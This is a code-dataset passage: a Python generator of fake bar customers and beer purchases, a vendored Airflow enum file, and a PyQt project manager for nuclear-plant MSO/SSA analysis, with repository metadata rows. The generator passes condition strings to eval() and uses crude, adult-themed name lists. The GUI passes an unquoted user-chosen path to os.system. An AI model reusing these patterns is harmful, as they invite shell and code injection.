return decoded_token["email"]
except InvalidTokenError:
return None
|
[
"socanime@gmail.com"
] |
socanime@gmail.com
|
2e9bb71c6257e2923c9b3b65dbe3d1d47201c11e
|
795f88819c160f32c346e9698501957fa08cb743
|
/dataGenerator/dataGenerator.py
|
c2a6d8ae1256deca034ab146eeee2aeefe47c2e1
|
[
"MIT"
] |
permissive
|
GwennaelBuchet/zenibar
|
367c9526c4cb447c5eb28ec7bd95e5f8be575213
|
ea7c8bcb287377ff416a80b477bce00b4edd63ad
|
refs/heads/master
| 2021-09-05T05:29:27.734597
| 2018-01-24T12:10:29
| 2018-01-24T12:10:29
| 115,437,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,367
|
py
|
from datetime import datetime as _dt
from datetime import date as _date
from datetime import timedelta as _td
import math
import random
import json
class Beer:
def __init__(self, id, brand, model, strongness, style, color, origin, price):
self.id = id
self.brand = brand
self.model = model
self.strongness = strongness
self.style = style
self.color = color
self.origin = origin
self.rank = 0
self.price = price
self.stock = 0
def canMatch(self, conditions):
for condition in conditions:
if eval("self." + condition) == False:
return False
return True
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class Customer:
"""Un client et son historique"""
def __init__(self, id, firstname, lastname,
registrationDate, lastvisitDate,
averageUptakesPerDay, habits, ponderationDays, amount):
self.id = id
self.firstname = firstname
self.lastname = lastname
self.registrationYear = registrationDate.year
self.registrationMonth = registrationDate.month
self.registrationDay = registrationDate.day
self.registrationDate = registrationDate
self.lastvisitYear = lastvisitDate.year
self.lastvisitMonth = lastvisitDate.month
self.lastvisitDay = lastvisitDate.day
self.lastvisitDate = lastvisitDate
self.averageUptakesPerDay = averageUptakesPerDay
self.habits = habits
# beers that fit the habits/preferences of this customer
self.suitableBeers = []
self.uptakes = []
# ponderationDays correspond tho the percents of chance the customer will go to the bar for each day of the week
self.ponderationDays = ponderationDays
self.amount = amount
@staticmethod
def generateName(indice):
namesList = [["Adrien", "Legrand"], ["Gwennael", "Buchet"], ["Marcel", "Beliveau"], ["Sasha", "Foxxx"],
["Jenna", "Haze"], ["Riley", "Reid"], ["Kobe", "Tai"], ["Daisie", "Marie"], ["Lisa", "Ann"],
["Tori", "Black"], ["Jannice", "Griffith"], ["Emilie", "Grey"], ["Mia", "Khalifa"],
["Cassidy", "Banks"], ["Régine", "Zylberberg"], ["Nikita", "Bellucci"]]
firstnames = ["Amber", "Andy", "Natasha", "Sandy", "Aurora", "Susie", "Cathy", "Clara", "Coralie", "Erika",
"Estelle", "Jenna", "Kelly", "Teri", "Shannon", "Jasmin", "Stormy", "Dolly", "Gina", "Heather",
"Julia", "Marilyn", "Olivia", "Vanessa", "Nikita", "Brigitte"]
lastnames = ["Labouche", "Storm", "Doll", "Lynn", "Vega", "Lord", "Kitty", "Angel", "Amor", "Dee", "Pecheresse",
"King", "Young", "Love", "Star", "Tits", "Moon", "Tekila", "Coco", "Shave", "Canelle", "Chocolat",
"Barbie", "Ladyboy", "Queer", "Dior", "Stone", "Kass", "Pink"]
if indice < len(namesList):
return namesList[indice]
firstname = firstnames[math.ceil(random.random() * len(firstnames)) - 1]
lastname = lastnames[(indice - len(namesList) - 1) % len(lastnames)]
return [firstname, lastname]
@staticmethod
def generateFirstDate():
delta = _td(math.ceil(random.random() * 60))
return OPENING_DATE + delta
@staticmethod
def generateLastDate():
delta = _td(math.ceil(random.random() * 30))
return LAST_DATE - delta
@staticmethod
def generateAverageUptakes():
return 1 + math.ceil(random.random() * 5)
@staticmethod
def generatePonderations():
ponderations = []
ponderations.append(random.random() / 5) # monday
ponderations.append(0.2 + random.random() / 3.5) # tuesday
ponderations.append(0.2 + random.random() / 3) # wednesday
ponderations.append(0.3 + random.random() / 2) # thursday
ponderations.append(0.35 + random.random() / 2) # friday
ponderations.append(0.66 + random.random() / 3) # saturday
ponderations.append(0) # sunday. Bar is closed
return ponderations
@staticmethod
def generateHabits():
habits = []
# strongness
strongness = round(4 + random.random() * 5, 1)
strongnessSign = "<" if math.copysign(1, -1 + random.random() * 2) < 0 else ">"
if strongness <= 6:
strongnessSign = ">"
if strongness >= 9:
strongnessSign = "<"
habits.append("strongness" + strongnessSign + str(strongness))
# style
allStyles = ["'IPA'", "'Amber'", "'Belgian Pale Ale'", "'Belgian Dark Ale'", "'Lager'", "'Abbaye'", "'White'",
"'Alcool Free'", "'Extra Special Bitter'"]
selectedStyles = []
for s in allStyles:
if random.random() < 0.5:
selectedStyles.append(s)
style = "style in [" + ", ".join(selectedStyles)
style += "]"
habits.append(style)
# color
allColors = ["'White'", "'Blond'", "'Amber'", "'Brown'", "'Black'"]
selectedColors = []
for i, c in enumerate(allColors):
if random.random() < 0.5:
selectedColors.append(c)
color = "color in [" + ", ".join(selectedColors)
color += "]"
habits.append(color)
return habits
@staticmethod
def generateAmount():
return math.ceil(36 + random.random() * 40)
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class Uptake:
def __init__(self, customerId, beersId):
self.customerId = customerId
self.beersId = beersId
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class DailyUptakes:
"""History of uptakes for 1 day"""
def __init__(self, weather, singleDateTime):
self.weather = weather
self.year = singleDateTime.year
self.month = singleDateTime.month
self.day = singleDateTime.day
self.uptakes = []
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class CustomerDailyUptakes:
"""Une consommation par le client"""
def __init__(self, singleDateTime, beersId):
self.year = singleDateTime.year
self.month = singleDateTime.month
self.day = singleDateTime.day
self.beersId = beersId
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class Bar:
def __init__(self, beers, customers):
self.dailyUptakes = []
self.beers = beers
self.customers = []
self.nbTotalUptakes = 0
for customer in customers:
self.addCustomer(customer)
def addCustomer(self, customer):
self.addSuitableBeersToCustomer(customer)
while len(customer.suitableBeers) == 0:
customer.habits = Customer.generateHabits()
self.addSuitableBeersToCustomer(customer)
self.customers.append(customer)
def addBeer(self, beer):
self.addSuitableBeerToCustomers(beer)
self.beers.append(beer)
def addSuitableBeersToCustomer(self, customer):
""" Try to find beers in this bar which can fit customer's habits """
for beer in self.beers:
if beer.canMatch(customer.habits):
customer.suitableBeers.append(beer)
customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)
def addSuitableBeerToCustomers(self, beer):
""" Try to find customers who can like this beer """
for customer in self.customers:
if beer.canMatch(customer.habits):
customer.suitableBeers.append(beer)
customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)
def _try(self, o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
separators=(',', ':')).replace(
'\n', '')
class Weather:
def __init__(self, temperature, humidity):
self.temperature = temperature
self.humidity = humidity
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
def generateBeers():
beers = [Beer(1, "Kasteel", "Triple", 11, "Belgian Pale Ale", "Blonde", "Belgium", 6),
Beer(2, "La Raoul", "", 6.5, "Lager", "Blond", "France", 3.6),
Beer(3, "Rochefort", "8", 9.2, "Abbaye", "Brown", "Belgium", 5.5),
Beer(4, "Bière du Corbeau", "", 9, "Belgian Pale Ale", "Blond", "Belgium", 5),
Beer(5, "Cuvée des Trolls", "Blonde", 7, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
Beer(6, "Orval", "Blonde", 7, "Abbaye", "Amber", "Belgium", 5),
Beer(7, "Brewdog", "Punk IPA", 5.6, "IPA", "Blond", "Scotland", 4.5),
Beer(8, "Westmalle", "Triple", 9.5, "Abbaye", "Blond", "Belgium", 5),
Beer(9, "Rince Cochon", "Blonde", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
Beer(10, "Hinano", "", 5, "Lager", "Blond", "Polynesia", 4),
Beer(11, "La Levrette", "Blonde", 5, "Lager", "Blond", "France", 4.5),
Beer(12, "La Fée Torchette", "Blonde", 6.5, "Lager", "Blond", "France", 4.5),
Beer(13, "La Trappe", "Quadrupel", 10, "Belgian Pale Ale", "Amber", "Belgium", 5),
Beer(14, "Kwak", "", 8.4, "Belgian Pale Ale", "Amber", "Belgium", 5.5),
Beer(15, "Tripel Karmeliet", "", 8.4, "Belgian Pale Ale", "Blond", "Belgium", 5.3),
Beer(16, "Omnipollo", "Fatamorgana", 8, "IPA", "Amber", "Sweden", 6.5),
Beer(17, "Barbar", "Miel", 8, "Belgian Pale Ale", "Blond", "Belgium", 6.4),
Beer(18, "Iron Maiden", "Trooper", 4.7, "Extra Special Bitter", "Blond", "England", 4.6),
Beer(19, "Gulden", "Draak", 10.7, "Belgian Dark Ale", "Brown", "Belgium", 5.8),
Beer(20, "Delirium", "Tremens", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 5.4),
Beer(21, "Chimay", "Bleue", 9, "Belgian Dark Ale", "Brown", "Belgium", 5.4),
Beer(22, "Angelus", "Blonde", 7, "Belgian Pale Ale", "Blond", "France", 4.8),
Beer(23, "Pietra", "", 6, "Lager", "Blond", "France", 3.8),
Beer(24, "Brewdog", "Nanny State", 0.5, "Alcool Free", "Blond", "Scotland", 3.8),
Beer(25, "La Chouffe", "Blonde", 8, "Belgian Pale Ale", "Blond", "Belgium", 4.6),
Beer(26, "Blue Moon", "White Ale", 5.4, "White", "White", "USA", 4.5),
Beer(27, "Rousse du Mont Blanc", "", 6.5, "Amber", "Amber", "France", 3.6),
Beer(28, "Rochefort", "10", 11.3, "Abbaye", "Brown", "Belgium", 6),
Beer(29, "Saint Bernardus", "Abt 12", 10, "Belgian Pale Ale", "Brown", "Belgium", 5)
]
return beers
def generateCustomers():
customers = []
for i in range(0, NB_CUSTOMERS):
name = Customer.generateName(i)
firstDate = Customer.generateFirstDate()
lastDate = Customer.generateLastDate()
averageUptakesPerDay = Customer.generateAverageUptakes()
habits = Customer.generateHabits()
amount = Customer.generateAmount()
ponderationDays = Customer.generatePonderations()
customers.append(
Customer(i, name[0], name[1], firstDate, lastDate, averageUptakesPerDay, habits, ponderationDays, amount)
)
return customers
def getTempetatureFactor(temperature):
if temperature < 5:
return 0.85
if temperature > 22:
return 2 - (22 / temperature) # [1.04 ; 1.35]
return 1
def getHumidityFactor(humidity):
if humidity < 0.7:
return 1.2
if humidity > 0.9:
return 0.8
return 1
def willCustomerComeThisDay(customer, weather, singleDateTime):
# dayPonderation = percent of chance the customer goes to the bar today
# get standard ponderation for this customer for today
chancesHeWillComeToday = customer.ponderationDays[singleDateTime.weekday()]
# let's add some random to our ponderation, between -0.2 and + 0.2
# dayPonderation += (-0.2 + math.ceil(random.random() * 0.4))
# dayPonderation = max(0, min(1, dayPonderation)) # just to ensure to get in [0, 1] only
# moderate ponderation with weather
chancesHeWillComeToday *= getTempetatureFactor(weather.temperature) # 0.85 ; 1 ; [1.04 ; 1.35]
chancesHeWillComeToday *= getHumidityFactor(weather.humidity) # 1.2 ; 1 ; 0.8
# random=[0.0, 1.0], so it's convenient to compare with chances the customer will come today
return random.random() < chancesHeWillComeToday
def generateUptakesFor1Customer(customer, weather, singleDateTime):
""" Generates all the uptakes of a customer, based on its habits """
if not willCustomerComeThisDay(customer, weather, singleDateTime):
return None
# generates a random number of uptakes, based on the user habits
nbUptakes = max(0, customer.averageUptakesPerDay + (-1 + math.ceil(random.random() * 2)))
# The further we are in the month, the lower money the customer have :/
nbUptakes *= round(math.sin(0.03 * singleDateTime.day + math.pi / 2), 4) # [1; 0.6]
nbSuitableBeers = len(customer.suitableBeers)
if nbSuitableBeers == 0:
return None
beers = []
while nbUptakes > 0:
# find a suitable beer for the customer
beer = customer.suitableBeers[math.ceil(random.random() * (nbSuitableBeers - 1))]
beers.append(beer.id)
nbUptakes = nbUptakes - 1
return Uptake(customer.id, beers)
def generateWeather(singleDateTime, averageHumidityPerMonth):
""" Generates aweather condition, based on the date """
currentAverage = averageHumidityPerMonth[singleDateTime.month - 1]
r = random.random()
h = round(currentAverage + (r / 10), 2)
t = math.ceil(-10 + ((1 - currentAverage) * (50 + 25 * r)))
return Weather(t, h)
def dateRange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + _td(n)
def lastDay():
today = _dt.now()
snowCampDay = _dt(2018, 1, 25)
if snowCampDay < today:
return today
return snowCampDay
def generateMonthsHumidity():
averageHumidityPerMonth = []
for m in range(0, 12):
averageHumidityPerMonth.append(math.fabs(math.sin((-6 + m) / 12)) + 0.4) # to get values between 0.4 and 1
return averageHumidityPerMonth
def generateData():
endDay = lastDay()
customers = generateCustomers()
beers = generateBeers()
bar = Bar(beers, customers)
# pre-compute an average humidity per month to speed-up computation of the weather conditions per day
averageHumidityPerMonth = generateMonthsHumidity()
# fill in each day from the opening of the bar with uptakes
for singleDateTime in dateRange(OPENING_DATE, endDay):
weather = generateWeather(singleDateTime, averageHumidityPerMonth)
dailyUptakes = DailyUptakes(weather, singleDateTime)
for customer in bar.customers:
if customer.registrationDate <= singleDateTime and customer.lastvisitDate >= singleDateTime:
uptakes = generateUptakesFor1Customer(customer, weather, singleDateTime)
if uptakes != None:
dailyUptakes.uptakes.append(uptakes)
customerUptakes = CustomerDailyUptakes(singleDateTime, uptakes.beersId)
customer.uptakes.append(customerUptakes)
bar.nbTotalUptakes += len(uptakes.beersId)
bar.dailyUptakes.append(dailyUptakes)
return bar
##############################################################################
NB_CUSTOMERS = 50
OPENING_DATE = _dt(2012, 1, 1)
LAST_DATE = lastDay()
monthPonderations = [7, 8, 8.5, 9, 10, 10, 8.5, 6.5, 10, 10, 10, 6]
""" Start data generation """
bar = generateData()
with open('./zenibar_history.json', 'w+') as fu:
fu.write(bar.to_JSON())
print(bar.nbTotalUptakes)
|
[
"gwennael.buchet@gmail.com"
] |
gwennael.buchet@gmail.com
|
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe
|
245b92f4140f30e26313bfb3b2e47ed1871a5b83
|
/airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py
|
7a1cbbf42dce80b65a8b1c81159737e23be143fb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
ephraimbuddy/airflow
|
238d6170a0e4f76456f00423124a260527960710
|
3193857376bc2c8cd2eb133017be1e8cbcaa8405
|
refs/heads/main
| 2023-05-29T05:37:44.992278
| 2023-05-13T19:49:43
| 2023-05-13T19:49:43
| 245,751,695
| 2
| 1
|
Apache-2.0
| 2021-05-20T08:10:14
| 2020-03-08T04:28:27
| null |
UTF-8
|
Python
| false
| false
| 1,509
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
r"""Container for enum describing possible campaign feed errors.
"""
class CampaignFeedError(proto.Enum):
r"""Enum describing possible campaign feed errors."""
UNSPECIFIED = 0
UNKNOWN = 1
FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
CANNOT_CREATE_FOR_REMOVED_FEED = 4
CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
INVALID_PLACEHOLDER_TYPE = 7
MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
noreply@github.com
|
7f394586d195a86c52647c95b64076218b61bfd6
|
395e06560c7b794a965add40c586684cb0b4e59c
|
/terrascript/ultradns/d.py
|
6fdcb1b3110014abb8abde0673bba426c6116dbf
|
[
"BSD-2-Clause",
"Python-2.0"
] |
permissive
|
alanyee/python-terrascript
|
f01edef3f6e21e5b18bc3295efef1657be17e3ca
|
e880e7650a7c3a88603d5429dafbacd28cd26c7e
|
refs/heads/develop
| 2023-03-09T07:33:32.560816
| 2020-09-21T07:11:09
| 2020-09-21T07:11:09
| 300,696,024
| 0
| 0
|
BSD-2-Clause
| 2021-02-18T00:33:30
| 2020-10-02T17:57:18
| null |
UTF-8
|
Python
| false
| false
| 28
|
py
|
# terrascript/ultradns/d.py
|
[
"ilon.sjogren@enplore.com"
] |
ilon.sjogren@enplore.com
|
deb20b06a842a226505f4352f62729b0865cad89
|
f0463eba4010126fc0574945c2f9b2cd6eb40cff
|
/Component/Windows.py
|
f5c0b35c5e82f1d6668ba09e042bf92cf2805776
|
[] |
no_license
|
Choewonyeong/Standard_Project3
|
b572c3fbf2ac379980b95d7247c867f092b7a09d
|
155903d450c1da7355914c72aa07b8f23a03e336
|
refs/heads/master
| 2022-06-21T18:51:42.766380
| 2020-05-08T00:28:04
| 2020-05-08T00:28:04
| 262,183,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,657
|
py
|
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtWidgets import QWidget, QAction, QMenu, QMenuBar, QLineEdit
from PyQt5.QtWidgets import QDialog, QTableWidget, QTableWidgetItem, QLabel
from PyQt5.QtWidgets import QMessageBox, QComboBox, QTabWidget, QFileDialog
from PyQt5.QtWidgets import QFormLayout, QPushButton, QVBoxLayout, QHBoxLayout
from Component.Shortcut import Shortcut
from Component.Materials import Checkbox
from Component.Materials import CheckboxItem
from Component.Projects.AreaTab import AreaTab
from Component.Projects.CableTab import CableTab
from Component.Projects.EquipTab import EquipTab
from Component.Projects.LogicTap import LogicTab
from Component.Projects.AnalysTab import AnalysTab
from Component.Project import Project
from Excel.Import import Import
from Excel.Export import Export
import shutil
import os
__author__ = "Wonyeong Choe <choewy@stdte.co.kr>"
class Windows(QWidget):
def __init__(self):
QWidget.__init__(self)
self.dirs = ['']+os.listdir('Data')
self.dirs.remove('Origin')
self.db_name = ''
self.__setting__()
self.__component__()
def __setting__(self):
self.setWindowTitle('원전 MSO, SSA 분석 프로그램')
self.setMinimumWidth(800)
self.setMinimumHeight(800)
self.geometry().center()
self.showMaximized()
self.setWindowIcon(QIcon('icon.ico'))
def __component__(self):
self.__menubar__()
self.__combobox__()
self.__pushbutton__()
self.__tab__()
self.__layout__()
def __menubar__(self):
action_version = QAction('프로그램 정보', self)
self.action_shortcut = QAction('단축키 정보', self)
action_exit = QAction('닫기', self)
action_exit.setShortcut('Ctrl+Q')
action_version.triggered.connect(self.Version)
self.action_shortcut.triggered.connect(self.Shortcut)
action_exit.triggered.connect(self.Exit)
menu_main = QMenu('메뉴', self)
menu_main.addAction(action_version)
menu_main.addAction(self.action_shortcut)
menu_main.addSeparator()
menu_main.addAction(action_exit)
action_new = QAction('새 프로젝트', self)
action_new.setShortcut('Ctrl+N')
action_admin = QAction('프로젝트 관리', self)
action_admin.setShortcut('Ctrl+M')
action_refresh = QAction('새로고침', self)
action_refresh.setShortcut('F5')
action_new.triggered.connect(self.New)
action_admin.triggered.connect(self.Admin)
action_refresh.triggered.connect(self.Refresh)
menu_project = QMenu('프로젝트', self)
menu_project.addAction(action_new)
menu_project.addAction(action_admin)
menu_project.addAction(action_refresh)
self.menubar = QMenuBar(self)
self.menubar.addMenu(menu_main)
self.menubar.addMenu(menu_project)
def New(self):
self.lineedit_project = QLineEdit()
self.button_close = QPushButton('닫기')
self.button_create = QPushButton('생성')
self.button_create.setDefault(True)
self.button_close.clicked.connect(self.Close)
self.button_create.clicked.connect(self.Create)
layout_form = QFormLayout()
layout_form.addRow('프로젝트 명', self.lineedit_project)
layout_buttons = QHBoxLayout()
layout_buttons.addWidget(self.button_close)
layout_buttons.addWidget(self.button_create)
layout = QVBoxLayout()
layout.addLayout(layout_form)
layout.addLayout(layout_buttons)
self.dig = QDialog(self)
self.dig.setLayout(layout)
self.dig.setFixedWidth(300)
self.dig.setFixedHeight(100)
self.dig.setWindowTitle('새 프로젝트 생성')
self.dig.exec_()
def __checkbox__(self, table, row, col):
checkboxitem = CheckboxItem()
checkbox = Checkbox(checkboxitem)
checkbox.stateChanged.connect(self.Checked)
table.setItem(row, col, checkboxitem)
table.setCellWidget(row, col, checkbox)
def Checked(self, check):
row = self.table.currentRow()
if check == 2:
self.checked.append(row)
elif check == 0:
self.checked.remove(row)
def Admin(self):
self.checked = []
dirs = ['']+os.listdir('Data')
dirs.remove('Origin')
action_close = QAction('닫기')
action_close.triggered.connect(self.CloseProject)
action_delete = QAction('삭제')
action_delete.setShortcut('Alt+2')
action_delete.triggered.connect(self.DeleteProject)
menubar = QMenuBar()
menubar.addAction(action_close)
menubar.addAction(action_delete)
self.table = QTableWidget()
self.table.setRowCount(0)
self.table.setColumnCount(len(['선택', '프로젝트명']))
self.table.setHorizontalHeaderLabels(['선택', '프로젝트명'])
style = "QTableWidget{color: black;}"
self.table.setStyleSheet(style)
for row, project in enumerate(dirs):
self.table.insertRow(row)
self.table.setRowHeight(row, 50)
self.__checkbox__(self.table, row, 0)
item = QTableWidgetItem(project)
item.setFlags(Qt.ItemIsEditable)
self.table.setItem(row, 1, item)
self.table.resizeColumnsToContents()
self.table.hideRow(0)
self.table.verticalHeader().setVisible(False)
self.table.horizontalHeader().setStretchLastSection(True)
layout = QVBoxLayout()
layout.addWidget(menubar)
layout.addWidget(self.table)
self.dig_project = QDialog(self)
self.dig_project.setLayout(layout)
self.dig_project.setWindowTitle('프로젝트 관리')
self.dig_project.setFixedWidth(400)
self.dig_project.setFixedHeight(800)
self.dig_project.exec_()
def CloseProject(self):
self.dig_project.close()
def DeleteProject(self):
self.checked.sort(reverse=True)
for row in self.checked:
project = self.table.item(row, 1).text()
index = self.dirs.index(project)
current = f"Data/{project}"
shutil.rmtree(current)
self.combobox_project.removeItem(index)
self.dirs.remove(project)
self.table.removeRow(row)
self.checked.clear()
def Refresh(self):
index = self.project.currentIndex()
self.project.clear()
self.project.addTab(AreaTab(self.db_name, self, self.Refresh), '방화지역')
self.project.addTab(EquipTab(self.db_name, self, self.Refresh), '기기')
self.project.addTab(CableTab(self.db_name, self, self.Refresh), '케이블')
self.project.addTab(LogicTab(self.db_name, self, self.Refresh), '논리')
self.project.addTab(AnalysTab(self.db_name, self, self.Refresh), '분석')
self.project.setCurrentIndex(index)
def Version(self):
pixmap = QPixmap('logo.png').scaledToWidth(300)
label_logo = QLabel()
label_logo.setPixmap(pixmap)
label_logo.setAlignment(Qt.AlignCenter)
label_title = QLabel('<h3>원전 MSO, SSA 분석 프로그램 V1.0</h3>')
label_title.setAlignment(Qt.AlignCenter)
layout_head = QVBoxLayout()
layout_head.addWidget(QLabel('소 속 :'))
layout_head.addWidget(QLabel('개 발 자 :'))
layout_head.addWidget(QLabel('제 작 일 :'))
layout_head.addWidget(QLabel('개 요 :'))
layout_head.addWidget(QLabel(''))
layout_content = QVBoxLayout()
layout_content.addWidget(QLabel('(주)스탠더드시험연구소'))
layout_content.addWidget(QLabel('최원영'))
layout_content.addWidget(QLabel('2019-06-10'))
layout_content.addWidget(QLabel('본 프로그램은 (주)스탠더드시험연구소에서 자체적으로 개발한'))
layout_content.addWidget(QLabel('원전 다중오동작(MSO), 안전정지(SSA) 분석을 위한 프로그램입니다.'))
layout_info = QHBoxLayout()
layout_info.addLayout(layout_head)
layout_info.addLayout(layout_content)
layout = QVBoxLayout()
layout.addWidget(label_title)
layout.addWidget(QLabel(''))
layout.addLayout(layout_info)
layout.addWidget(QLabel(''))
layout.addWidget(label_logo)
self.dig_version = QDialog(self)
self.dig_version.setStyleSheet('QDialog{background: white;}')
self.dig_version.setWindowTitle('프로그램 정보')
self.dig_version.setLayout(layout)
self.dig_version.setFixedWidth(460)
self.dig_version.setFixedHeight(280)
self.dig_version.exec_()
def Shortcut(self):
idx = self.tab.count()
self.tab.addTab(Shortcut(), '단축키 정보')
self.tab.setCurrentIndex(idx)
self.action_shortcut.setEnabled(False)
def Exit(self):
self.close()
def Create(self):
db_name = self.lineedit_project.text()
if db_name == '':
QMessageBox.question(self, '오류', '프로젝트 이름을 입력하세요.', QMessageBox.Close)
elif os.path.isdir(f"Data/{db_name}"):
QMessageBox.question(self, '오류', '이미 존재하는 프로젝트입니다.', QMessageBox.Close)
elif db_name != '':
self.dirs.append(db_name)
origin = os.listdir("Data/Origin")
os.makedirs(f"Data/{db_name}")
for index, db in enumerate(origin):
origin_db = f"Data/Origin/{db}"
new_db = f"Data/{db_name}/{db}"
shutil.copy(origin_db, new_db)
self.dig.close()
self.combobox_project.addItems([f'{db_name}'])
def Close(self):
self.dig.close()
def __combobox__(self):
self.combobox_project = QComboBox()
self.combobox_project.addItems(self.dirs)
def __pushbutton__(self):
self.button_project = QPushButton('열기')
self.button_project.clicked.connect(self.Open)
self.button_import = QPushButton('업로드')
self.button_import.clicked.connect(self.Import)
self.button_import.setVisible(False)
self.button_export = QPushButton('다운로드')
self.button_export.clicked.connect(self.Export)
self.button_export.setVisible(False)
def Open(self):
self.db_name = self.combobox_project.currentText()
count = self.tab.count()
tab_bars = []
if count != 0:
for idx in range(count):
text = self.tab.tabText(idx)
tab_bars.append(text)
if self.db_name == '':
self.button_import.setVisible(False)
self.button_export.setVisible(False)
elif self.db_name != '' and self.db_name not in tab_bars:
self.project = Project(self.db_name, self.Refresh)
self.tab.addTab(self.project, self.db_name)
self.tab.setCurrentIndex(self.tab.currentIndex()+1)
self.button_import.setVisible(True)
self.button_export.setVisible(True)
self.button_import.setShortcut('Ctrl+I')
self.button_export.setShortcut('Ctrl+E')
def Import(self):
dig_file = QFileDialog(self)
file_name = dig_file.getOpenFileName(self, caption='엑셀 파일 업로드', directory='', filter='*.xlsx')[0]
if file_name != '':
try:
db_path = f"Data/{self.db_name}"
shutil.rmtree(db_path)
os.makedirs(db_path)
Import(self.db_name, file_name)
self.Refresh()
except:
QMessageBox.question(self, '오류', '업로드에 실패하였습니다.\n엑셀 파일의 양식을 확인하세요.', QMessageBox.Close)
def Export(self):
dig_dirs = QFileDialog(self)
file_path = dig_dirs.getSaveFileName(caption='엑셀 파일 다운로드', directory='', filter='*.xlsx')[0]
if file_path != '':
Export(self.db_name, file_path)
self.Refresh()
self.__success_export__(file_path)
def __success_export__(self, file_path):
label_text = QLabel('다운로드가 완료되었습니다.\n')
label_text.setAlignment(Qt.AlignCenter)
self.file_path = file_path
self.button_ignore = QPushButton('닫기')
self.button_open = QPushButton('열기')
self.button_ignore.clicked.connect(self.Ignore_ExcelFile)
self.button_open.clicked.connect(self.Open_ExcelFile)
layout_button = QHBoxLayout()
layout_button.addWidget(self.button_ignore)
layout_button.addWidget(self.button_open)
layout = QVBoxLayout()
layout.addWidget(label_text)
layout.addLayout(layout_button)
self.dig_export = QDialog(self)
self.dig_export.setLayout(layout)
self.dig_export.setWindowTitle('알림')
style = "QDialog{background-color: white;}"
self.dig_export.setFixedWidth(300)
self.dig_export.setFixedHeight(150)
self.dig_export.setStyleSheet(style)
self.dig_export.show()
def Ignore_ExcelFile(self):
self.dig_export.close()
def Open_ExcelFile(self):
os.system(f"start excel.exe {self.file_path}")
self.dig_export.close()
def __tab__(self):
self.tab = QTabWidget()
self.tab.setMovable(True)
self.tab.setTabsClosable(True)
self.tab.tabCloseRequested.connect(self.CloseTab)
def CloseTab(self, index):
self.tab.removeTab(index)
tab_name = self.tab.tabText(index)
if tab_name == '단축키 정보':
self.action_shortcut.setEnabled(True)
def __layout__(self):
layout_project = QHBoxLayout()
layout_project.addWidget(QLabel(' 프로젝트 선택'))
layout_project.addWidget(self.combobox_project, 5)
layout_project.addWidget(self.button_project, 0)
layout_excelfile = QHBoxLayout()
layout_excelfile.addWidget(QLabel(''), 10)
layout_excelfile.addWidget(self.button_import, 1)
layout_excelfile.addWidget(self.button_export, 1)
layout_top = QHBoxLayout()
layout_top.addLayout(layout_project, 5)
layout_top.addLayout(layout_excelfile, 5)
layout = QVBoxLayout()
layout.addWidget(self.menubar, 0)
layout.addLayout(layout_top, 0)
layout.addWidget(self.tab, 10)
self.setLayout(layout)
|
[
"choewy@stdte.co.kr"
] |
choewy@stdte.co.kr
|
e7d869dd783dc38a75347e17f4554bba94a9bb86
|
78957a573d0554b3476698bb3c9cc07eb17e17d9
|
/amplify/backend/function/awsamplifyauthstarte960f0db4/src/index.py
|
321b1c7bfee9e77e88013a581370dac7b9090996
|
[
"MIT-0"
] |
permissive
|
BearTECH-Consulting-Inc/demo-phc-amplify-auth
|
a500275f94c512dd7b27d32e2c78553770c47181
|
e20a1e503397a3d0fe0f26d93850d5d6c1429775
|
refs/heads/main
| 2023-08-10T21:58:31.380914
